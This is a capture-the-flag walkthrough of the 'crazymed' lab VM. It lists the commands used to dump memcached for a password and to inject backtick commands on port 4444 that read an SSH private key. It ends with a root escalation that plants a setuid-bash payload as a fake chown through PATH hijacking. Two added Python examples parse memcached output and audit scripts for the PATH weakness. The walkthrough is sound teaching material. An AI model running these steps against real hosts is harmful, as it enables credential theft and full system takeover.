Information gathering

Host scan

arp-scan -l

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.122.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 07:25 EDT
Nmap scan report for 192.168.122.168
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp    open  http      Apache httpd 2.4.54 ((Debian))
4444/tcp  open  krb524?
11211/tcp open  memcached Memcached 1.6.9 (uptime 491 seconds)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.94SVN%I=7%D=5/10%Time=663E0427%P=x86_64-pc-linux-gnu%r
SF:(NULL,2C3,"\x1b\[H\x1b\[2J\x1b\[3J\x1b\[1;97mW\x1b\[0m\x1b\[1;97me\x1b\
SF:[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;
SF:97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b
SF:\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b\[0m\x1b
SF:\[1;97mh\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mC
SF:\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97mz\x1b\[0m\x1
SF:b\[1;97my\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97md\x
SF:1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x
SF:1b\[1;97md\x1b\[0m\x1b\[1;97mi\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97ma\
SF:x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mr\x1b\[0m\
SF:x1b\[1;97me\x1b\[0m\x1b\[1;97ms\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97ma
SF:\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mh\x1b\[0m\x1
SF:b\[1;97m\x20\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97m
SF:b\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x
SF:1b\[1;97mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97my\
SF:x1b\[0m\x1b\[1;97m\.\x1b\[0m\nAll\x20our\x20tests\x20are\x20performed\x
SF:20on\x20human\x20volunteers\x20for\x20a\x20fee\.\n\n\nPassword:\x20")%r
SF:(GetRequest,30D,"\x1b\[H\x1b\[2J\x1b\[3J\x1b\[1;97mW\x1b\[0m\x1b\[1;97m
SF:e\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mo\x1b\[0m\x
SF:1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97
SF:mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b\[
SF:0m\x1b\[1;97mh\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[
SF:1;97mC\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97mz\x1b\
SF:[0m\x1b\[1;97my\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;
SF:97md\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b
SF:\[0m\x1b\[1;97md\x1b\[0m\x1b\[1;97mi\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1
SF:;97ma\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mr\x1
SF:b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97ms\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[
SF:1;97ma\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mh\x1b\
SF:[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\
SF:[1;97mb\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b
SF:\[0m\x1b\[1;97mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1
SF:;97my\x1b\[0m\x1b\[1;97m\.\x1b\[0m\nAll\x20our\x20tests\x20are\x20perfo
SF:rmed\x20on\x20human\x20volunteers\x20for\x20a\x20fee\.\n\n\nPassword:\x
SF:20\x1b\[1;31mAccess\x20denied\.\x1b\[0m\n\nPassword:\x20\x1b\[1;31mAcce
SF:ss\x20denied\.\x1b\[0m\n\nPassword:\x20");
MAC Address: 08:00:27:8C:1C:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.36 seconds

Directory scan

payload:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,*  -u http://192.168.122.168
/assets               (Status: 301) [Size: 319] [--> http://192.168.122.168/assets/]
/forms                (Status: 301) [Size: 318] [--> http://192.168.122.168/forms/]
/manual               (Status: 301) [Size: 319] [--> http://192.168.122.168/manual/]

Nothing unusual was found here.

So we connect to each of the remaining ports with nc to see what they serve.

  1. 11211/tcp open memcached Memcached 1.6.9 (uptime 491 seconds)
From another author's writeup (wp) I found that msf can be used for this.
msfconsole
msf6 > search gather/memcached_extractor
show options
set rhost 192.168.122.168
run
[+] 192.168.122.168:11211 - memcached loot stored at /root/.msf4/loot/20240510110229_default_192.168.122.168_memcached.dump_353967.txt
[*] 192.168.122.168:11211 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

password:

Opening the loot file reveals a password.

{"conf_location"=>"VALUE conf_location 0 21\r\n/etc/memecacched.conf\r\nEND\r\n", "log"=>"VALUE log 0 18\r\npassword: cr4zyM3d\r\nEND\r\n", "server"=>"VALUE server 0 9\r\n127.0.0.1\r\nEND\r\n", "domain"=>"VALUE domain 0 8\r\ncrazymed\r\nEND\r\n"}
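The loot file stores, for every key, the raw memcached text-protocol response (`VALUE <key> <flags> <bytes>`, the data block, then `END`). The following is an added example, not code from the walkthrough or from the Metasploit module: a small parser for that response format plus a triage helper that flags credential-looking entries. The sample bytes are constructed from the four entries shown above; the list of "sensitive" markers is an assumption chosen for the demo.

```python
"""Parser for memcached text-protocol retrieval responses.

Added example, not part of the original walkthrough. Each dumped entry has
the form
    VALUE <key> <flags> <bytes>\r\n<data>\r\nEND\r\n
Parsing by the declared byte count rather than splitting on CRLF matters,
because a cached value may itself contain line breaks.
"""
from __future__ import annotations

# Constructed sample, modelled on the four entries in the loot dump above.
SAMPLE_RESPONSE = (
    b"VALUE conf_location 0 21\r\n/etc/memecacched.conf\r\nEND\r\n"
    b"VALUE log 0 18\r\npassword: cr4zyM3d\r\nEND\r\n"
    b"VALUE server 0 9\r\n127.0.0.1\r\nEND\r\n"
    b"VALUE domain 0 8\r\ncrazymed\r\nEND\r\n"
)

# Substrings that usually mean a cache entry holds credential material
# (assumed list for this demo; extend for your environment).
SENSITIVE_MARKERS = (b"password", b"passwd", b"secret", b"token")


def parse_memcached_values(raw: bytes) -> dict[str, bytes]:
    """Return {key: data} for every VALUE block in the concatenated responses.

    Raises ValueError on a malformed header line or a truncated data block.
    """
    items: dict[str, bytes] = {}
    pos = 0
    while pos < len(raw):
        eol = raw.find(b"\r\n", pos)
        if eol == -1:
            raise ValueError(f"unterminated line at offset {pos}")
        line = raw[pos:eol]
        pos = eol + 2
        if line in (b"END", b""):
            continue
        fields = line.split()
        # Header: VALUE <key> <flags> <bytes> [<cas unique>]
        if len(fields) < 4 or fields[0] != b"VALUE":
            raise ValueError(f"unexpected line: {line!r}")
        key = fields[1].decode("ascii")
        length = int(fields[3])
        data = raw[pos:pos + length]
        # The data block must be exactly <bytes> long and be followed by CRLF.
        if len(data) != length or raw[pos + length:pos + length + 2] != b"\r\n":
            raise ValueError(f"truncated data block for key {key!r}")
        items[key] = data
        pos += length + 2
    return items


def find_sensitive(items: dict[str, bytes]) -> list[str]:
    """Keys whose name or data contains a credential-looking marker.

    Useful when triaging what a network-reachable instance was serving:
    every key returned here is material that should never have been
    retrievable without authentication.
    """
    hits = []
    for key, data in items.items():
        blob = (key.encode("ascii", "replace") + b" " + data).lower()
        if any(marker in blob for marker in SENSITIVE_MARKERS):
            hits.append(key)
    return hits


if __name__ == "__main__":
    parsed = parse_memcached_values(SAMPLE_RESPONSE)
    for k, v in parsed.items():
        print(f"{k:15s} {v!r}")
    print("sensitive:", find_sensitive(parsed))
```

The underlying problem on this box is that memcached 1.6.9 listens on all interfaces with no authentication; the usual fix is to bind it to the loopback address (`-l 127.0.0.1` in /etc/memcached.conf) and to block 11211 at the host firewall, so that a dump like the one above is only possible from the machine itself.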

On 4444/tcp (reported by nmap as krb524?) we found that commands can be executed. Reference: Kerberos身份验证流程及Kerberos流量解密 - zpchcbd - 博客园 (cnblogs.com) (Kerberos authentication flow and Kerberos traffic decryption).

Kerberos is a network authentication protocol developed at MIT (Massachusetts Institute of Technology). It is designed to provide strong authentication for client/server applications using secret-key cryptography.

nc 192.168.122.168 4444
Password: cr4zyM3d
Access granted.
Type "?" for help.
System command: 
At the "System command:" prompt, echo `command` is passed to system(), so the backtick-quoted command is executed on the host.

System command: echo `ls -al`
total 36 drwxr-xr-x 4 brad brad 4096 May 10 17:11 . drwxr-xr-x 3 root root 4096 Oct 31 2022 .. lrwxrwxrwx 1 root root 9 May 10 17:11 .bash_history -> /dev/null -rw-r--r-- 1 brad brad 220 Oct 26 2022 .bash_logout -rw-r--r-- 1 brad brad 3526 Oct 31 2022 .bashrc drwxr-xr-x 3 brad brad 4096 Nov 1 2022 .local -rw-r--r-- 1 brad brad 807 Oct 26 2022 .profile drwx------ 2 brad brad 4096 Oct 29 2022 .ssh -rwx------ 1 brad brad 33 Oct 31 2022 user.txt -rw-r--r-- 1 brad brad 165 Oct 31 2022 .wget-hsts
System command: echo `cat .ssh`
A .ssh directory exists, so we try to use it to log in.
echo `cat .ssh/id_rsa`
Copy and paste the key; the login succeeds.

Getting a shell

With the retrieved id_rsa we get a shell.

user.txt:f70a9801673220fb56f42cf9d5ddc28b

Privilege escalation

Using pspy64 we found a scheduled script.

brad@crazymed:/opt$ cat check_VM
#! /bin/bash

#users flags
flags=(/root/root.txt /home/brad/user.txt)
for x in "${flags[@]}"
do
if [[ ! -f $x ]] ; then
echo "$x doesn't exist"
mcookie > $x
chmod 700 $x
fi
done
chown -R www-data:www-data /var/www/html
#bash_history => /dev/null
home=$(cat /etc/passwd |grep bash |awk -F: '{print $6}')
for x in $home
do
ln -sf /dev/null $x/.bash_history ; eccho "All's fine !"
done
find /var/log -name "*.log*" -exec rm -f {} +

So we use PATH hijacking: the script calls chown without an absolute path, so we can plant a fake chown in a directory that comes earlier in PATH than /bin, and escalate directly.

brad@crazymed:/tmp$ echo "chmod u+s /bin/bash" > /usr/local/bin/chown
brad@crazymed:/tmp$ chmod +x /usr/local/bin/chown
brad@crazymed:/tmp$ /bin/bash -p

Privilege escalation succeeded.

bash-5.1# id
uid=1000(brad) gid=1000(brad) euid=0(root) groups=1000(brad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
b9b38d9533ca00072eff46338bf21b43
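The weakness in check_VM is that a root cron job resolves chown (and several other commands) through PATH at run time. The following is an added example, not code from the walkthrough or from the box: a small audit that (1) lists the commands a script calls by bare name and (2) lists the PATH entries the current user can write to, which together are the two conditions for this escalation. The watched-command list is an assumption for the demo; the sample script is the /opt/check_VM content shown above.

```python
"""Audit a scheduled script for the PATH-hijacking weakness used above.

Added example, not part of the original walkthrough. Two checks:
  1. commands that the script invokes by bare name, which are resolved
     through PATH when the job runs (as root, from cron);
  2. PATH entries the current user can write to, which is what turns a
     bare-name call into a privilege-escalation path.
The fix is to pin PATH at the top of the script and to call binaries by
absolute path (/usr/bin/chown, /usr/bin/chmod, ...).
"""
from __future__ import annotations

import os
import re
import sys

# Commands worth flagging in a root-run maintenance script (assumed list).
WATCHED = {"awk", "cat", "chmod", "chown", "find", "grep", "ln", "mcookie", "rm"}

# A watched name counts as a command when it starts the line or follows a
# separator (whitespace ; & | ( ` $); a '/' before it means an absolute path.
_CALL = re.compile(
    r"(?:^|[\s;&|(`$])(" + "|".join(sorted(WATCHED)) + r")(?=\s|$)"
)

# /opt/check_VM as shown in the walkthrough (the 'eccho' typo is in the original).
SAMPLE_SCRIPT = """\
#! /bin/bash

#users flags
flags=(/root/root.txt /home/brad/user.txt)
for x in "${flags[@]}"
do
if [[ ! -f $x ]] ; then
echo "$x doesn't exist"
mcookie > $x
chmod 700 $x
fi
done
chown -R www-data:www-data /var/www/html
#bash_history => /dev/null
home=$(cat /etc/passwd |grep bash |awk -F: '{print $6}')
for x in $home
do
ln -sf /dev/null $x/.bash_history ; eccho "All's fine !"
done
find /var/log -name "*.log*" -exec rm -f {} +
"""


def unqualified_commands(script: str) -> list[tuple[int, str]]:
    """(line number, command) for each watched command called by bare name."""
    hits: list[tuple[int, str]] = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comments and the shebang line
        for match in _CALL.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits


def writable_path_dirs(path_value: str) -> list[str]:
    """PATH entries that exist and are writable by the invoking user.

    An empty entry (``a::b`` or a trailing colon) means the current directory.
    """
    result = []
    for entry in path_value.split(":"):
        directory = entry or "."
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            result.append(directory)
    return result


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCRIPT
    for lineno, cmd in unqualified_commands(text):
        print(f"line {lineno}: '{cmd}' resolved via PATH")
    for d in writable_path_dirs(os.environ.get("PATH", "")):
        print(f"writable PATH entry: {d}")
```

Run it as `python3 audit_path.py /opt/check_VM` on the box (file name assumed). On the sample script it reports nine bare-name calls, including the chown on line 13 that the escalation above abuses. A hardened check_VM sets `PATH=/usr/sbin:/usr/bin:/sbin:/bin` as its first line and calls `/usr/bin/chown`, `/usr/bin/chmod`, `/usr/bin/find` and so on; after that change the first check reports nothing, and the directory hijack planted in /usr/local/bin no longer has any effect.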

Key takeaways

  1. 4444/tcp open krb524?: a password-protected user authentication service
  2. 11211/tcp open memcached Memcached 1.6.9 (uptime 491 seconds): using the cache server's commands
  3. PATH hijacking (a classic, used several times before)
  4. Using nc to connect to ports